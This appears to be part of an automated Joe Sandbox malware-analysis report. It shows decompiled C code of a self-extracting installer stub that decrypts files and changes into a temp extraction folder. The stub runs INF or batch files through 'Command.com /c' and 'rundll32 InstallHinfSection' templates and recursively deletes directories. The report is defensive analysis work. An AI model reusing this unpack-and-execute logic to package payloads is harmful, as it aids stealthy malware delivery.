                                                                                                                                                                                                                                            0x00a91e89
                                                                                                                                                                                                                                            0x00a91e91
                                                                                                                                                                                                                                            0x00a91e92
                                                                                                                                                                                                                                            0x00a91e94
                                                                                                                                                                                                                                            0x00a91e97
                                                                                                                                                                                                                                            0x00a91ea4
                                                                                                                                                                                                                                            0x00a91ea4
                                                                                                                                                                                                                                            0x00a91c61
                                                                                                                                                                                                                                            0x00a91c07
                                                                                                                                                                                                                                            0x00a91bd3
                                                                                                                                                                                                                                            0x00a91b7b

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A91BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A91BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A91C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00A91C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A91140,00000000,00000008,?), ref: 00A91CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00A91D1B
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-852641736
                                                                                                                                                                                                                                            • Opcode ID: 44fbb06089f3af50b16ae43ea82537fc6f133f438d7b5f236ac759e95e5b1c55
                                                                                                                                                                                                                                            • Instruction ID: d4cba36836da309a0e1db60ab8d05c45a98a424b864731fc4b1fd5f4c4a35f0c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44fbb06089f3af50b16ae43ea82537fc6f133f438d7b5f236ac759e95e5b1c55
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59A13670B0021A6BEF20DB24CC45BFA77E9EB55310F24079AE555A72D0EFB08E86CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 406 a92f1d-a92f3d 407 a92f6c-a92f73 call a95164 406->407 408 a92f3f-a92f46 406->408 415 a92f79-a92f80 call a955a0 407->415 416 a93041 407->416 410 a92f48 call a951e5 408->410 411 a92f5f-a92f66 call a93a3f 408->411 417 a92f4d-a92f4f 410->417 411->407 411->416 415->416 424 a92f86-a92fbe GetSystemDirectoryA call a9658a LoadLibraryA 415->424 420 a93043-a93053 call a96ce0 416->420 417->416 421 a92f55-a92f5d 417->421 421->407 421->411 428 a92fc0-a92fd4 GetProcAddress 424->428 429 a92ff7-a93004 FreeLibrary 424->429 428->429 430 a92fd6-a92fee DecryptFileA 428->430 431 a93017-a93024 SetCurrentDirectoryA 429->431 432 a93006-a9300c 429->432 430->429 445 a92ff0-a92ff5 430->445 433 a93054-a9305a 431->433 434 a93026-a9303c call a944b9 call a96285 431->434 432->431 435 a9300e call a9621e 432->435 439 a9305c call a93b26 433->439 440 a93065-a9306c 433->440 434->416 441 a93013-a93015 435->441 451 a93061-a93063 439->451 442 a9307c-a93089 440->442 443 a9306e-a93075 call a9256d 440->443 441->416 441->431 448 a9308b-a93091 442->448 449 a930a1-a930a9 442->449 452 a9307a 443->452 445->429 448->449 453 a93093 call a93ba2 448->453 455 a930ab-a930ad 449->455 456 a930b4-a930b7 449->456 451->416 451->440 452->442 459 a93098-a9309a 453->459 455->456 458 a930af call a94169 455->458 456->420 458->456 459->416 461 a9309c 459->461 461->449
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A92F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0xa98a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E00A95164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E00A96CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E00A955A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E00A9658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0xa9a288("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0xa98a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                                                            							if(_t21 != 0) {
                                                                                                                                                                                                                                            								__eflags =  *0xa98a2c - _t44; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									__eflags =  *0xa98d48 & 0x000000c0;
                                                                                                                                                                                                                                            									if(( *0xa98d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            										_t41 =  *0xa99a40; // 0x3, executed
                                                                                                                                                                                                                                            										_t26 = E00A9256D(_t41); // executed
                                                                                                                                                                                                                                            										_t44 = _t26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t22 =  *0xa98a24; // 0x0
                                                                                                                                                                                                                                            									 *0xa99a44 = _t44;
                                                                                                                                                                                                                                            									__eflags = _t22;
                                                                                                                                                                                                                                            									if(_t22 != 0) {
                                                                                                                                                                                                                                            										L26:
                                                                                                                                                                                                                                            										__eflags =  *0xa98a38;
                                                                                                                                                                                                                                            										if( *0xa98a38 == 0) {
                                                                                                                                                                                                                                            											__eflags = _t22;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												E00A94169(__eflags);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t12 = 1;
                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags =  *0xa99a30 - _t22; // 0x0
                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t25 = E00A93BA2(); // executed
                                                                                                                                                                                                                                            										__eflags = _t25;
                                                                                                                                                                                                                                            										if(_t25 == 0) {
                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t22 =  *0xa98a24; // 0x0
                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t27 = E00A93B26(_t40, _t44);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t43 = 0x4bc;
                                                                                                                                                                                                                                            							E00A944B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                            							 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t59 =  *0xa99a30 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A9621E(); // executed
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t49 =  *0xa98a24;
                                                                                                                                                                                                                                            				if( *0xa98a24 != 0) {
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					_t34 = E00A93A3F(_t51);
                                                                                                                                                                                                                                            					_t52 = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A951E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0xa98a38;
                                                                                                                                                                                                                                            				if( *0xa98a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00a92f1d
                                                                                                                                                                                                                                            0x00a92f28
                                                                                                                                                                                                                                            0x00a92f2f
                                                                                                                                                                                                                                            0x00a92f3d
                                                                                                                                                                                                                                            0x00a92f6c
                                                                                                                                                                                                                                            0x00a92f6c
                                                                                                                                                                                                                                            0x00a92f71
                                                                                                                                                                                                                                            0x00a92f73
                                                                                                                                                                                                                                            0x00a93041
                                                                                                                                                                                                                                            0x00a93041
                                                                                                                                                                                                                                            0x00a93043
                                                                                                                                                                                                                                            0x00a93053
                                                                                                                                                                                                                                            0x00a93053
                                                                                                                                                                                                                                            0x00a92f79
                                                                                                                                                                                                                                            0x00a92f80
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92f86
                                                                                                                                                                                                                                            0x00a92f86
                                                                                                                                                                                                                                            0x00a92f93
                                                                                                                                                                                                                                            0x00a92f9e
                                                                                                                                                                                                                                            0x00a92fa0
                                                                                                                                                                                                                                            0x00a92fa6
                                                                                                                                                                                                                                            0x00a92fb8
                                                                                                                                                                                                                                            0x00a92fba
                                                                                                                                                                                                                                            0x00a92fbe
                                                                                                                                                                                                                                            0x00a92fc6
                                                                                                                                                                                                                                            0x00a92fcc
                                                                                                                                                                                                                                            0x00a92fd4
                                                                                                                                                                                                                                            0x00a92fd6
                                                                                                                                                                                                                                            0x00a92fd8
                                                                                                                                                                                                                                            0x00a92fe0
                                                                                                                                                                                                                                            0x00a92fe6
                                                                                                                                                                                                                                            0x00a92fee
                                                                                                                                                                                                                                            0x00a92ff0
                                                                                                                                                                                                                                            0x00a92ff5
                                                                                                                                                                                                                                            0x00a92ff5
                                                                                                                                                                                                                                            0x00a92fee
                                                                                                                                                                                                                                            0x00a92fd4
                                                                                                                                                                                                                                            0x00a92ff8
                                                                                                                                                                                                                                            0x00a92ffe
                                                                                                                                                                                                                                            0x00a93004
                                                                                                                                                                                                                                            0x00a93017
                                                                                                                                                                                                                                            0x00a9301c
                                                                                                                                                                                                                                            0x00a93024
                                                                                                                                                                                                                                            0x00a93054
                                                                                                                                                                                                                                            0x00a9305a
                                                                                                                                                                                                                                            0x00a93065
                                                                                                                                                                                                                                            0x00a93065
                                                                                                                                                                                                                                            0x00a9306c
                                                                                                                                                                                                                                            0x00a9306e
                                                                                                                                                                                                                                            0x00a93075
                                                                                                                                                                                                                                            0x00a9307a
                                                                                                                                                                                                                                            0x00a9307a
                                                                                                                                                                                                                                            0x00a9307c
                                                                                                                                                                                                                                            0x00a93081
                                                                                                                                                                                                                                            0x00a93087
                                                                                                                                                                                                                                            0x00a93089
                                                                                                                                                                                                                                            0x00a930a1
                                                                                                                                                                                                                                            0x00a930a1
                                                                                                                                                                                                                                            0x00a930a9
                                                                                                                                                                                                                                            0x00a930ab
                                                                                                                                                                                                                                            0x00a930ad
                                                                                                                                                                                                                                            0x00a930af
                                                                                                                                                                                                                                            0x00a930af
                                                                                                                                                                                                                                            0x00a930ad
                                                                                                                                                                                                                                            0x00a930b6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9308b
                                                                                                                                                                                                                                            0x00a9308b
                                                                                                                                                                                                                                            0x00a93091
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93093
                                                                                                                                                                                                                                            0x00a93098
                                                                                                                                                                                                                                            0x00a9309a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9309c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9309c
                                                                                                                                                                                                                                            0x00a93089
                                                                                                                                                                                                                                            0x00a9305c
                                                                                                                                                                                                                                            0x00a93061
                                                                                                                                                                                                                                            0x00a93063
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93063
                                                                                                                                                                                                                                            0x00a9302b
                                                                                                                                                                                                                                            0x00a93032
                                                                                                                                                                                                                                            0x00a9303c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9303c
                                                                                                                                                                                                                                            0x00a93006
                                                                                                                                                                                                                                            0x00a9300c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9300e
                                                                                                                                                                                                                                            0x00a93015
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93015
                                                                                                                                                                                                                                            0x00a92f80
                                                                                                                                                                                                                                            0x00a92f3f
                                                                                                                                                                                                                                            0x00a92f46
                                                                                                                                                                                                                                            0x00a92f5f
                                                                                                                                                                                                                                            0x00a92f5f
                                                                                                                                                                                                                                            0x00a92f64
                                                                                                                                                                                                                                            0x00a92f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92f66
                                                                                                                                                                                                                                            0x00a92f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92f55
                                                                                                                                                                                                                                            0x00a92f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A92F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A92FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A92FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 00A92FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00A92FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A9301C
                                                                                                                                                                                                                                              • Part of subcall function 00A951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F4D,?,00000002,00000000), ref: 00A95201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-2099937843
                                                                                                                                                                                                                                            • Opcode ID: c195b1f8b7b15578c936843f44b3b8bb7fb5a8358b7d5d0a9299199f54288032
                                                                                                                                                                                                                                            • Instruction ID: a833c30ea14a48bec16a2f618b59078a450034adc6ff38a11f344684fa0940af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c195b1f8b7b15578c936843f44b3b8bb7fb5a8358b7d5d0a9299199f54288032
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3241A832B00205AADF30EBB99D4976B33F8EB55790F11016BE941C2591EF78CE82CB65
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A92390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E00A96CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A91680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E00A916B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E00A91680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E00A916B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E00A916B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E00A9658A( &_v280, 0x104, 0xa91140);
                                                                                                                                                                                                                                            								E00A92390( &_v284);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                            0x00a92398
                                                                                                                                                                                                                                            0x00a9239e
                                                                                                                                                                                                                                            0x00a923a3
                                                                                                                                                                                                                                            0x00a923a5
                                                                                                                                                                                                                                            0x00a923ae
                                                                                                                                                                                                                                            0x00a923b3
                                                                                                                                                                                                                                            0x00a924cb
                                                                                                                                                                                                                                            0x00a924d2
                                                                                                                                                                                                                                            0x00a924d3
                                                                                                                                                                                                                                            0x00a924d4
                                                                                                                                                                                                                                            0x00a924df
                                                                                                                                                                                                                                            0x00a923c2
                                                                                                                                                                                                                                            0x00a923d1
                                                                                                                                                                                                                                            0x00a923db
                                                                                                                                                                                                                                            0x00a923e4
                                                                                                                                                                                                                                            0x00a923f6
                                                                                                                                                                                                                                            0x00a923fc
                                                                                                                                                                                                                                            0x00a92401
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92407
                                                                                                                                                                                                                                            0x00a92407
                                                                                                                                                                                                                                            0x00a92408
                                                                                                                                                                                                                                            0x00a92411
                                                                                                                                                                                                                                            0x00a9241f
                                                                                                                                                                                                                                            0x00a9247a
                                                                                                                                                                                                                                            0x00a92483
                                                                                                                                                                                                                                            0x00a92495
                                                                                                                                                                                                                                            0x00a924a3
                                                                                                                                                                                                                                            0x00a92421
                                                                                                                                                                                                                                            0x00a9242f
                                                                                                                                                                                                                                            0x00a92453
                                                                                                                                                                                                                                            0x00a9245d
                                                                                                                                                                                                                                            0x00a92466
                                                                                                                                                                                                                                            0x00a92472
                                                                                                                                                                                                                                            0x00a92472
                                                                                                                                                                                                                                            0x00a9242f
                                                                                                                                                                                                                                            0x00a924af
                                                                                                                                                                                                                                            0x00a924b5
                                                                                                                                                                                                                                            0x00a924be
                                                                                                                                                                                                                                            0x00a924c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a924c5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00A98A3A,00A911F4,00A98A3A,00000000,?,?), ref: 00A923F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A911F8), ref: 00A92427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A911FC), ref: 00A9243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A92495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00A924A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A924AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00A924BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00A98A3A), ref: 00A924C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
